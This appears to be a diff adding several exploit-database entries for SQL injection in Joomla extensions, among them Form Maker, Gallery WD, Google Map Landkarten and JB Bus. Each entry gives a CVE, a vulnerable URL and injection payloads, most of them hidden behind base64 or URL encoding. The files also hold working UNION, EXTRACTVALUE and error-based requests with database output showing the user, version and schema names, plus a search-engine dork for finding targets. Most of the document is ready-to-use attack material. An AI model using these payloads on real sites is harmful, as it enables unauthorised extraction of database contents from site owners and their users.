+# JTMxJTIwJTIwJTJmJTJhJTIxJTMwJTM3JTM3JTM3JTM3JTU1JTRlJTQ5JTRmJTRlJTJhJTJmJTI4JTJmJTJhJTIxJTMwJTM3JTM3JTM3JTM3JTUzJTQ1JTRjJTQ1JTQzJTU0JTJhJTJmJTMwJTc4JTMyJTM4JTMzJTMxJTMyJTM5JTJjJTI4JTJmJTJhJTIxJTMwJTM3JTM3JTM3JTM3JTUzJTY1JTZjJTY1JTYzJTc0JTJhJTJmJTIwJTY1JTc4JTcwJTZmJTcyJTc0JTVmJTczJTY1JTc0JTI4JTM1JTJjJTQwJTNhJTNkJTMwJTJjJTI4JTJmJTJhJTIxJTMwJTM3JTM3JTM3JTM3JTczJTY1JTZjJTY1JTYzJTc0JTJhJTJmJTIwJTYzJTZmJTc1JTZlJTc0JTI4JTJhJTI5JTJmJTJhJTIxJTMwJTM3JTM3JTM3JTM3JTY2JTcyJTZmJTZkJTJhJTJmJTI4JTY5JTZlJTY2JTZmJTcyJTZkJTYxJTc0JTY5JTZmJTZlJTVmJTczJTYzJTY4JTY1JTZkJTYxJTJlJTYzJTZmJTZjJTc1JTZkJTZlJTczJTI5JTJmJTJhJTIxJTMwJTM3JTM3JTM3JTM3JTc3JTY4JTY1JTcyJTY1JTJhJTJmJTQwJTNhJTNkJTY1JTc4JTcwJTZmJTcyJTc0JTVmJTczJTY1JTc0JTI4JTM1JTJjJTY1JTc4JTcwJTZmJTcyJTc0JTVmJTczJTY1JTc0JTI4JTM1JTJjJTQwJTJjJTc0JTYxJTYyJTZjJTY1JTVmJTZlJTYxJTZkJTY1JTJjJTMwJTc4JTMzJTYzJTM2JTYzJTM2JTM5JTMzJTY1JTJjJTMyJTI5JTJjJTYzJTZmJTZjJTc1JTZkJTZlJTVmJTZlJTYxJTZkJTY1JTJjJTMwJTc4JTYxJTMzJTYxJTJjJTMyJTI5JTI5JTJjJTQwJTJjJTMyJTI5JTI5JTJjJTMwJTc4JTMyJTM4JTMzJTMzJTMyJTM5JTJjJTMwJTc4JTMyJTM4JTMzJTM0JTMyJTM5JTJjJTMwJTc4JTMyJTM4JTMzJTM1JTMyJTM5JTJjJTMwJTc4JTMyJTM4JTMzJTM2JTMyJTM5JTJjJTMwJTc4JTMyJTM4JTMzJTM3JTMyJTM5JTJjJTMwJTc4JTMyJTM4JTMzJTM4JTMyJTM5JTJjJTMwJTc4JTMyJTM4JTMzJTM5JTMyJTM5JTJjJTMwJTc4JTMyJTM4JTMzJTMxJTMzJTMwJTMyJTM5JTJjJTMwJTc4JTMyJTM4JTMzJTMxJTMzJTMxJTMyJTM5JTI5JTJkJTJkJTIwJTJk
+# 
+# MSsvKiEwNjY2NlVOSU9OKi8oLyohMDY2NjZTRUxFQ1QqLyUzMCU3OCUzMiUzOCUzMyUzMSUzMiUzOSxDT05DQVRfV1MoMHgyMDNhMjAsVVNFUigpLERBVEFCQVNFKCksVkVSU0lPTigpKSwlMzAlNzglMzIlMzglMzMlMzMlMzIlMzksJTMwJTc4JTMyJTM4JTMzJTM0JTMyJTM5LCUzMCU3OCUzMiUzOCUzMyUzNSUzMiUzOSwlMzAlNzglMzIlMzglMzMlMzYlMzIlMzksJTMwJTc4JTMyJTM4JTMzJTM3JTMyJTM5LCUzMCU3OCUzMiUzOCUzMyUzOCUzMiUzOSwlMzAlNzglMzIlMzglMzMlMzklMzIlMzksJTMwJTc4JTMyJTM4JTMzJTMxJTMzJTMwJTMyJTM5LCUzMCU3OCUzMiUzOCUzMyUzMSUzMyUzMSUzMiUzOSktLSst
+# 
+# # # #

exploits/php/webapps/44109.txt

@@ -0,0 +1,24 @@
+# # # #
+# Exploit Title: Joomla! Component Fastball 2.5 - SQL Injection
+# Dork: N/A
+# Date: 16.02.2018
+# Vendor Homepage: http://www.fastballproductions.com/
+# Software Link: http://www.fastballproductions.com/
+# Version: 2.5
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-6373
+# # # #
+# Exploit Author: Ihsan Sencan 
+# # # # 
+# 
+# POC:
+# 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_fastball&view=player&season=[SQL]
+#  
+# JTMyJTI5JTIwJTQxJTRlJTQ0JTIwJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTMxJTM0JTMxJTM3JTIwJTQ2JTUyJTRmJTRkJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTQzJTRmJTU1JTRlJTU0JTI4JTJhJTI5JTJjJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTY0JTYxJTc0JTYxJTYyJTYxJTczJTY1JTI4JTI5JTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTQ1JTRjJTU0JTI4JTMxJTM0JTMxJTM3JTNkJTMxJTM0JTMxJTM3JTJjJTMxJTI5JTI5JTI5JTJjJTc2JTY1JTcyJTczJTY5JTZmJTZlJTI4JTI5JTJjJTQ2JTRjJTRmJTRmJTUyJTI4JTUyJTQxJTRlJTQ0JTI4JTMwJTI5JTJhJTMyJTI5JTI5JTc4JTIwJTQ2JTUyJTRmJTRkJTIwJTQ5JTRlJTQ2JTRmJTUyJTRkJTQxJTU0JTQ5JTRmJTRlJTVmJTUzJTQzJTQ4JTQ1JTRkJTQxJTJlJTUwJTRjJTU1JTQ3JTQ5JTRlJTUzJTIwJTQ3JTUyJTRmJTU1JTUwJTIwJTQyJTU5JTIwJTc4JTI5JTYxJTI5JTJkJTJkJTIwJTY3JTc0JTZhJTcz
+# 
+# # # #
+
+inurl:index.php?option=com_fastball season

exploits/php/webapps/44110.txt

@@ -0,0 +1,27 @@
+# # # #
+# Exploit Title: Joomla! Component File Download Tracker 3.0 - SQL Injection
+# Dork: N/A
+# Date: 16.02.2018
+# Vendor Homepage: http://techsolsystem.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/directory-a-documentation/downloads/file-download-tracker/
+# Version: 3.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-6004
+# # # #
+# Exploit Author: Ihsan Sencan 
+# # # # 
+# 
+# POC:
+# 
+# 1)
+# http://localhost/[PATH]/index.php?dynfield[phone]=[SQL]&option=com_dtracker&task=save
+#  
+# JTI1JTI3JTIwJTQxJTRlJTQ0JTIwJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTM0JTMzJTMyJTMzJTIwJTQ2JTUyJTRmJTRkJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTQzJTRmJTU1JTRlJTU0JTI4JTJhJTI5JTJjJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTc2JTY1JTcyJTczJTY5JTZmJTZlJTI4JTI5JTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTQ1JTRjJTU0JTI4JTM0JTMzJTMyJTMzJTNkJTM0JTMzJTMyJTMzJTJjJTMxJTI5JTI5JTI5JTJjJTY0JTYxJTc0JTYxJTYyJTYxJTczJTY1JTI4JTI5JTJjJTQ2JTRjJTRmJTRmJTUyJTI4JTUyJTQxJTRlJTQ0JTI4JTMwJTI5JTJhJTMyJTI5JTI5JTc4JTIwJTQ2JTUyJTRmJTRkJTIwJTQ5JTRlJTQ2JTRmJTUyJTRkJTQxJTU0JTQ5JTRmJTRlJTVmJTUzJTQzJTQ4JTQ1JTRkJTQxJTJlJTUwJTRjJTU1JTQ3JTQ5JTRlJTUzJTIwJTQ3JTUyJTRmJTU1JTUwJTIwJTQyJTU5JTIwJTc4JTI5JTYxJTI5JTIwJTQxJTRlJTQ0JTI3JTI1JTI3JTNkJTI3
+#  
+# 2)
+# http://localhost/[PATH]/index.php?option=com_dtracker&layout=download&sess=[SQL]
+#  
+# JTMxJTI3JTIwJTYxJTZlJTY0JTI4JTczJTY1JTZjJTY1JTYzJTc0JTIwJTMxJTIwJTQ2JTUyJTRmJTRkJTI4JTczJTY1JTZjJTY1JTYzJTc0JTIwJTYzJTZmJTc1JTZlJTc0JTI4JTJhJTI5JTJjJTYzJTZmJTZlJTYzJTYxJTc0JTI4JTI4JTczJTY1JTZjJTY1JTYzJTc0JTIwJTI4JTczJTY1JTZjJTY1JTYzJTc0JTIwJTYzJTZmJTZlJTYzJTYxJTc0JTI4JTY0JTYxJTc0JTYxJTYyJTYxJTczJTY1JTI4JTI5JTJjJTMwJTc4JTMyJTM3JTJjJTMwJTc4JTM3JTY1JTI5JTI5JTIwJTQ2JTUyJTRmJTRkJTIwJTY5JTZlJTY2JTZmJTcyJTZkJTYxJTc0JTY5JTZmJTZlJTVmJTczJTYzJTY4JTY1JTZkJTYxJTJlJTc0JTYxJTYyJTZjJTY1JTczJTIwJTRjJTQ5JTRkJTQ5JTU0JTIwJTMwJTJjJTMxJTI5JTJjJTY2JTZjJTZmJTZmJTcyJTI4JTcyJTYxJTZlJTY0JTI4JTMwJTI5JTJhJTMyJTI5JTI5JTc4JTIwJTQ2JTUyJTRmJTRkJTIwJTY5JTZlJTY2JTZmJTcyJTZkJTYxJTc0JTY5JTZmJTZlJTVmJTczJTYzJTY4JTY1JTZkJTYxJTJlJTc0JTYxJTYyJTZjJTY1JTczJTIwJTQ3JTUyJTRmJTU1JTUwJTIwJTQyJTU5JTIwJTc4JTI5JTYxJTI5JTJkJTJkJTIwJTJk
+#  
+# # # #

exploits/php/webapps/44111.txt

@@ -0,0 +1,48 @@
+# # # #
+# Exploit Title: Joomla! Component Form Maker 3.6.12 - SQL Injection
+# Dork: N/A
+# Date: 16.02.2018
+# Vendor Homepage: http://demo.web-dorado.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/forms/form-maker/
+# Version: 3.6.12
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-5991
+# # # #
+# Exploit Author: Ihsan Sencan 
+# # # # 
+# 
+# POC:
+# 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_formmaker&view=stats&id=[SQL]
+#  
+# JTMxJTI3JTIwJTIwJTU1JTRlJTQ5JTRmJTRlJTIwJTQxJTRjJTRjJTIwJTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTQ3JTUyJTRmJTU1JTUwJTVmJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTczJTYzJTY4JTY1JTZkJTYxJTVmJTZlJTYxJTZkJTY1JTIwJTUzJTQ1JTUwJTQxJTUyJTQxJTU0JTRmJTUyJTIwJTMwJTc4JTMzJTYzJTM2JTMyJTM3JTMyJTMzJTY1JTI5JTIwJTQ2JTUyJTRmJTRkJTIwJTQ5JTRlJTQ2JTRmJTUyJTRkJTQxJTU0JTQ5JTRmJTRlJTVmJTUzJTQzJTQ4JTQ1JTRkJTQxJTJlJTUzJTQzJTQ4JTQ1JTRkJTQxJTU0JTQxJTI5JTJkJTJkJTIwJTJkJTIw
+# 
+# 2)
+# http://localhost/[PATH]/index.php?option=com_formmaker&view=stats&form_id=1&id=1&from=[SQL]
+#  
+# JTIwJTYzJTZmJTc1JTZlJTc0JTI4JTJhJTI5JTY2JTcyJTZmJTZkJTI4JTY5JTZlJTY2JTZmJTcyJTZkJTYxJTc0JTY5JTZmJTZlJTVmJTczJTYzJTY4JTY1JTZkJTYxJTJlJTYzJTZmJTZjJTc1JTZkJTZlJTczJTI5JTc3JTY4JTY1JTcyJTY1JTQwJTNhJTNkJTY1JTc4JTcwJTZmJTcyJTc0JTVmJTczJTY1JTc0JTI4JTM1JTJjJTY1JTc4JTcwJTZmJTcyJTc0JTVmJTczJTY1JTc0JTI4JTM1JTJjJTQwJTJjJTc0JTYxJTYyJTZjJTY1JTVmJTZlJTYxJTZkJTY1JTJjJTMwJTc4JTMzJTYzJTM2JTYzJTM2JTM5JTMzJTY1JTJjJTMyJTI5JTJjJTYzJTZmJTZjJTc1JTZkJTZlJTVmJTZlJTYxJTZkJTY1JTJjJTMwJTc4JTYxJTMzJTYxJTJjJTMyJTI5JTI5JTJjJTQwJTJjJTMyJTI5JTI5JTJkJTJkJTIwJTJkJTIw
+# 
+# 3)
+# http://localhost/[PATH]/index.php?option=com_formmaker&view=stats&form_id=1&id=1&to=[SQL]
+#  
+# JTMxJTI3JTIwJTIwJTU1JTRlJTQ5JTRmJTRlJTIwJTQxJTRjJTRjJTIwJTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTQ3JTUyJTRmJTU1JTUwJTVmJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTc0JTYxJTYyJTZjJTY1JTVmJTZlJTYxJTZkJTY1JTIwJTUzJTQ1JTUwJTQxJTUyJTQxJTU0JTRmJTUyJTIwJTMwJTc4JTMzJTYzJTM2JTMyJTM3JTMyJTMzJTY1JTI5JTIwJTQ2JTUyJTRmJTRkJTIwJTQ5JTRlJTQ2JTRmJTUyJTRkJTQxJTU0JTQ5JTRmJTRlJTVmJTUzJTQzJTQ4JTQ1JTRkJTQxJTJlJTU0JTQxJTQyJTRjJTQ1JTUzJTIwJTU3JTQ4JTQ1JTUyJTQ1JTIwJTU0JTQxJTQyJTRjJTQ1JTVmJTUzJTQzJTQ4JTQ1JTRkJTQxJTNkJTQ0JTQxJTU0JTQxJTQyJTQxJTUzJTQ1JTI4JTI5JTI5JTJkJTJkJTIwJTJk
+# 
+# # # #
+
+
+
+
+
+1
+http://localhost/Joomla375/index.php?option=com_formmaker&view=stats&id=1'++UNION+ALL+SELECT+CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())--+- 
+root@localhost : joomla375 : 10.1.21-MariaDB
+
+2
+http://localhost/Joomla375/index.php?option=com_formmaker&view=stats&form_id=1&id=1&from=1%27%20%20%55%4e%49%4f%4e%20%41%4c%4c%20%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2d%2d%20%2d%20
+root@localhost : joomla375 : 10.1.21-MariaDB
+
+3
+http://localhost/Joomla375/index.php?option=com_formmaker&view=stats&form_id=1&id=1&to=1%27%20%20%55%4e%49%4f%4e%20%41%4c%4c%20%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2d%2d%20%2d%20
+root@localhost : joomla375 : 10.1.21-MariaDB

exploits/php/webapps/44112.txt

@@ -0,0 +1,35 @@
+# # # # 
+# Exploit Title: Joomla! Component Gallery WD 1.3.6 - SQL Injection
+# Dork: N/A
+# Date: 16.02.2018
+# Vendor Homepage: https://web-dorado.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-wd/
+# Software Download: https://web-dorado.com/?option=com_wdsubscriptions&view=dwnldfree&format=row&id=162
+# Version: 1.3.6
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-5981
+# # # #
+# Exploit Author: Ihsan Sencan 
+# # # # 
+# 
+# POC:
+# 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_gallery_wd&tag_id=&view=GalleryBox&gallery_id=7[SQL]
+# 
+# JTM3JTIwJTQxJTRlJTQ0JTIwJTQ1JTU4JTU0JTUyJTQxJTQzJTU0JTU2JTQxJTRjJTU1JTQ1JTI4JTM3JTMwJTM5JTMyJTJjJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTMwJTc4JTM1JTYzJTJjJTc2JTY1JTcyJTczJTY5JTZmJTZlJTI4JTI5JTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTQ1JTRjJTU0JTI4JTM3JTMwJTM5JTMyJTNkJTM3JTMwJTM5JTMyJTJjJTMxJTI5JTI5JTI5JTJjJTY0JTYxJTc0JTYxJTYyJTYxJTczJTY1JTI4JTI5JTI5JTI5
+# 
+# 2)
+# http://localhost/[PATH]/index.php?option=com_gallery_wd&tag_id=[SQL]&view=GalleryBox&gallery_id=7
+# 
+# JTI4JTU1JTUwJTQ0JTQxJTU0JTQ1JTU4JTRkJTRjJTI4JTMxJTJjJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTMwJTc4JTMyJTY1JTJjJTY0JTYxJTc0JTYxJTYyJTYxJTczJTY1JTI4JTI5JTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTQ1JTRjJTU0JTI4JTMyJTNkJTMyJTJjJTMxJTI5JTI5JTI5JTJjJTc2JTY1JTcyJTczJTY5JTZmJTZlJTI4JTI5JTI5JTJjJTM4JTM1JTM5JTM5JTI5JTI5
+# 
+# # # #
+
+
+http://localhost/Joomla375/index.php?option=com_gallery_wd&tag_id=(UPDATEXML(1,CONCAT(0x2e,database(),(SELECT (ELT(2=2,1))),version()),8599))&view=GalleryBox &gallery_id=7
+1105 XPATH syntax error: 'joomla375110.1.21-MariaDB' 
+
+http://localhost/Joomla375/index.php?option=com_gallery_wd&tag_id=&view=GalleryBox&gallery_id=%37%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%37%30%39%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%37%30%39%32%3d%37%30%39%32%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29
+1105 XPATH syntax error: '\10.1.21-MariaDB1joomla375'

exploits/php/webapps/44113.txt

@@ -0,0 +1,49 @@
+# # # #
+# Exploit Title: Joomla! Component Google Map Landkarten <= 4.2.3 - SQL Injection
+# Dork: N/A
+# Date: 16.02.2018
+# Vendor Homepage: http://www.joomla-24.de/
+# Software Link: https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/google-map-landkarten/
+# Software Download: http://www.joomla-24.de/download/send/9-komponenten/85-google-map-landkarten
+# Version: <= 4.2.3
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-6396
+# # # #
+# Exploit Author: Ihsan Sencan 
+# # # # 
+# 
+# POC:
+# 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_gmap&view=gm_markers&tmpl=component&layout=form_markers&cid=[SQL]&id=1&format=raw
+# 
+# MScrLyohMDMzMzNVTklPTiovKy8qITAzMzMzQUxMKi8rLyohMDMzMzNTRUxFQ1QqLytudUxsLG51TGwsbnVMbCxudUxsLG51TGwsbnVMbCxudUxsLG51TGwsLyohMDMzMzNDT05DQVQqLygoLyohMDMzMzNTRUxFQ1QqLyhAeCkvKiEwMzMzM0ZST00qLygvKiEwMzMzM1NFTEVDVCovKEB4Oj0weDAwKSwoQE5SOj0wKSwoLyohMDMzMzNTRUxFQ1QqLygwKS8qITAzMzMzRlJPTSovKElORk9STUFUSU9OX1NDSEVNQS5UQUJMRVMpLyohMDMzMzNXSEVSRSovKFRBQkxFX1NDSEVNQSE9MHg2OTZlNjY2ZjcyNmQ2MTc0Njk2ZjZlNWY3MzYzNjg2NTZkNjEpLyohMDMzMzNBTkQqLygweDAwKUlOKEB4Oj0vKiEwMzMzM0NPTkNBVCovKEB4LExQQUQoQE5SOj1ATlIlMmIxLDQsMHgzMCksMHgzYTIwLHRhYmxlX25hbWUsMHgzYzYyNzIzZSkpKSl4KSksbnVMbCxudUxsLS0rVmVyQXlhcmk=
+# 
+# MScrLyohMDc3NzdVTklPTiovKy8qITA3Nzc3QUxMKi8rLyohMDc3NzdTRUxFQ1QqLytudUxsLG51TGwsbnVMbCxudUxsLG51TGwsbnVMbCxudUxsLC8qITA3Nzc3Q09OQ0FUKi8oKC8qITA3Nzc3U0VMRUNUKi8oQHgpRlJPTShTRUxFQ1QoQHg6PTB4MDApLChATlI6PTApLCgvKiEwNzc3N1NFTEVDVCovKDApLyohMDc3NzdGUk9NKi8oSU5GT1JNQVRJT05fU0NIRU1BLlRBQkxFUykvKiEwNzc3N1dIRVJFKi8oVEFCTEVfU0NIRU1BIT0weDY5NmU2NjZmNzI2ZDYxNzQ2OTZmNmU1ZjczNjM2ODY1NmQ2MSkvKiEwNzc3N0FORCovKDB4MDApSU4oQHg6PS8qITA3Nzc3Q09OQ0FUKi8oQHgsTFBBRChATlI6PUBOUiUyYjEsNCwweDMwKSwweDNhMjAsdGFibGVfbmFtZSwweDNjNjI3MjNlKSkpKXgpKSxudUxsLG51TGwsbnVMbCxudUxsLS0rVmVyQXlhcmk=
+# 
+# 2)
+# http://localhost/[PATH]/index.php?option=com_gmap&view=gm_markers&tmpl=component&layout=form_markers&cid=1&id=[SQL]&format=raw
+# 
+# JTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTQzJTQxJTUzJTQ1JTIwJTU3JTQ4JTQ1JTRlJTIwJTI4JTMyJTM2JTMxJTMwJTNkJTMyJTM2JTMxJTMwJTI5JTIwJTU0JTQ4JTQ1JTRlJTIwJTMyJTM2JTMxJTMwJTIwJTQ1JTRjJTUzJTQ1JTIwJTMyJTM2JTMxJTMwJTJhJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTMyJTM2JTMxJTMwJTIwJTQ2JTUyJTRmJTRkJTIwJTQ5JTRlJTQ2JTRmJTUyJTRkJTQxJTU0JTQ5JTRmJTRlJTVmJTUzJTQzJTQ4JTQ1JTRkJTQxJTJlJTUwJTRjJTU1JTQ3JTQ5JTRlJTUzJTI5JTIwJTQ1JTRlJTQ0JTI5JTI5JTI2JTY2JTZmJTcyJTZkJTYxJTc0JTNkJTcyJTYxJTc3
+# 
+# MStBTkQrRVhUUkFDVFZBTFVFKDQ4NTUsQ09OQ0FUKDB4NWMsKFNFTEVDVCtHUk9VUF9DT05DQVQoc2NoZW1hX25hbWUrU0VQQVJBVE9SKzB4M2M2MjcyM2UpK0ZST00rSU5GT1JNQVRJT05fU0NIRU1BLlNDSEVNQVRBKSwoU0VMRUNUKyhFTFQoNDg1NT00ODU1LDEpKSksQ09OQ0FUX1dTKDB4MjAzYTIwLFVTRVIoKSxEQVRBQkFTRSgpLFZFUlNJT04oKSkpKQ==
+# 
+# 3)
+# http://localhost/[PATH]/index.php?option=com_gmap&view=gm_modal&tmpl=component&layout=default&map=[SQL]
+# 
+# JTI3JTIwJTJmJTJhJTIxJTMwJTM4JTM4JTM4JTM4JTQxJTRlJTQ0JTJhJTJmJTIwJTQ1JTU4JTU0JTUyJTQxJTQzJTU0JTU2JTQxJTRjJTU1JTQ1JTI4JTM2JTM2JTJjJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTMwJTc4JTM1JTYzJTJjJTI4JTJmJTJhJTIxJTMwJTM4JTM4JTM4JTM4JTUzJTQ1JTRjJTQ1JTQzJTU0JTJhJTJmJTIwJTQ3JTUyJTRmJTU1JTUwJTVmJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTczJTYzJTY4JTY1JTZkJTYxJTVmJTZlJTYxJTZkJTY1JTIwJTUzJTQ1JTUwJTQxJTUyJTQxJTU0JTRmJTUyJTIwJTMwJTc4JTMzJTYzJTM2JTMyJTM3JTMyJTMzJTY1JTI5JTIwJTQ2JTUyJTRmJTRkJTIwJTQ5JTRlJTQ2JTRmJTUyJTRkJTQxJTU0JTQ5JTRmJTRlJTVmJTUzJTQzJTQ4JTQ1JTRkJTQxJTJlJTUzJTQzJTQ4JTQ1JTRkJTQxJTU0JTQxJTI5JTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTQ1JTRjJTU0JTI4JTM0JTM3JTM2JTMyJTNkJTM0JTM3JTM2JTMyJTJjJTMxJTI5JTI5JTI5JTJjJTQzJTRmJTRlJTQzJTQxJTU0JTVmJTU3JTUzJTI4JTMwJTc4JTMyJTMwJTMzJTYxJTMyJTMwJTJjJTU1JTUzJTQ1JTUyJTI4JTI5JTJjJTQ0JTQxJTU0JTQxJTQyJTQxJTUzJTQ1JTI4JTI5JTJjJTU2JTQ1JTUyJTUzJTQ5JTRmJTRlJTI4JTI5JTI5JTI5JTI5JTJkJTJkJTIwJTU2JTY1JTcyJTQxJTc5JTYxJTcyJTY5
+# 
+# MScgQU5EIChTRUxFQ1QgMjk1OCBGUk9NKFNFTEVDVCBDT1VOVCgqKSxDT05DQVQoKFNFTEVDVCAoRUxUKDI5NTg9Mjk1OCwxKSkpLENPTkNBVF9XUygweDIwM2EyMCxVU0VSKCksREFUQUJBU0UoKSxWRVJTSU9OKCkpLEZMT09SKFJBTkQoMCkqMikpeCBGUk9NIElORk9STUFUSU9OX1NDSEVNQS5QTFVHSU5TIEdST1VQIEJZIHgpYSktLStWZXJBeWFyaQ==
+# 
+# # # #
+
+ 
+http://localhost/Joomla375/index.php?option=com_gmap&view=gm_modal&tmpl=component&layout=default&map='+/*!08888AND*/+EXTRACTVALUE(66,CONCAT(0x5c,(/*!08888SELECT*/+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA),(SELECT+(ELT(4762=4762,1))),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())))--+VerAyari
+1105 XPATH syntax error: '\bahistanitim<br>cmslite<br>doct' 
+
+http://localhost/Joomla375/index.php?option=com_gmap&view=gm_markers&tmpl=component&layout=form_markers&cid=1' AND (SELECT 6142 FROM(SELECT COUNT(*),CONCAT(0x494853414e2053454e43414e,(SELECT (ELT(6142=6142,1))),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ptYA&id=1&format=raw
+1062 Duplicate entry 'IHSAN SENCAN1root@localhost : joomla375 : 10.1.21-MariaDB1' for key 'group_key' 
+
+http://localhost/Joomla375/index.php?option=com_gmap&view=gm_markers&tmpl=component&layout=form_markers&cid=1&id=1+AND+EXTRACTVALUE(4855,CONCAT(0x5c,(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA),(SELECT+(ELT(4855=4855,1))),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())))&format=raw
+1105 XPATH syntax error: '\qpjkq1root@localhost : joomla37'

exploits/php/webapps/44114.txt

@@ -0,0 +1,22 @@
+# # # #
+# Exploit Title: Joomla! Component InviteX 3.0.5 - SQL Injection
+# Dork: N/A
+# Date: 16.02.2018
+# Vendor Homepage: http://techjoomla.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/content-sharing/bookmark-a-recommend/invitex/
+# Version: 3.0.5
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-6394
+# # # #
+# Exploit Author: Ihsan Sencan 
+# # # # 
+# 
+# POC:
+# 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_invitex&view=invites&invite_type=[SQL]&invite_anywhere=1
+#  
+# JTJkJTM4JTM3JTM3JTM4JTIwJTIwJTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTU1JTRlJTQ5JTRmJTRlJTJhJTJmJTIwJTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTUzJTQ1JTRjJTQ1JTQzJTU0JTJhJTJmJTIwJTMxJTJjJTMyJTJjJTMzJTJjJTM0JTJjJTM1JTJjJTM2JTJjJTM3JTJjJTM4JTJjJTM5JTJjJTMxJTMwJTJjJTMxJTMxJTJjJTMxJTMyJTJjJTMxJTMzJTJjJTQzJTRmJTRlJTQzJTQxJTU0JTVmJTU3JTUzJTI4JTMwJTc4JTMyJTMwJTMzJTYxJTMyJTMwJTJjJTU1JTUzJTQ1JTUyJTI4JTI5JTJjJTQ0JTQxJTU0JTQxJTQyJTQxJTUzJTQ1JTI4JTI5JTJjJTU2JTQ1JTUyJTUzJTQ5JTRmJTRlJTI4JTI5JTI5JTJjJTMxJTM1JTJjJTMxJTM2JTJjJTMxJTM3JTJjJTMxJTM4JTJjJTMxJTM5JTJkJTJkJTIwJTJk
+#  
+# # # #

exploits/php/webapps/44115.txt

@@ -0,0 +1,22 @@
+# # # #
+# Exploit Title: Joomla! Component JB Bus 2.3 - SQL Injection
+# Dork: N/A
+# Date: 16.02.2018
+# Vendor Homepage: http://joombooking.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/jbtransport/
+# Version: 2.3
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-6372
+# # # #
+# Exploit Author: Ihsan Sencan 
+# # # # 
+# 
+# POC:
+# 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_bookpro&view=orderdetail&order_number=[SQL]
+#  
+# JTMwJTMwJTMwJTM0JTM1JTMyJTIwJTJmJTJhJTIxJTM1JTMwJTMwJTMwJTMwJTUwJTcyJTZmJTYzJTY1JTY0JTc1JTcyJTY1JTJhJTJmJTIwJTJmJTJhJTIxJTM1JTMwJTMwJTMwJTMwJTQxJTZlJTYxJTZjJTc5JTczJTY1JTJhJTJmJTIwJTI4JTY1JTc4JTc0JTcyJTYxJTYzJTc0JTc2JTYxJTZjJTc1JTY1JTI4JTMwJTJjJTJmJTJhJTIxJTM1JTMwJTMwJTMwJTMwJTYzJTZmJTZlJTYzJTYxJTc0JTJhJTJmJTI4JTMwJTc4JTMyJTM3JTJjJTMwJTc4JTMzJTYxJTJjJTQwJTQwJTc2JTY1JTcyJTczJTY5JTZmJTZlJTI5JTI5JTJjJTMwJTI5JTJkJTJkJTIwJTJk
+#  
+# # # #

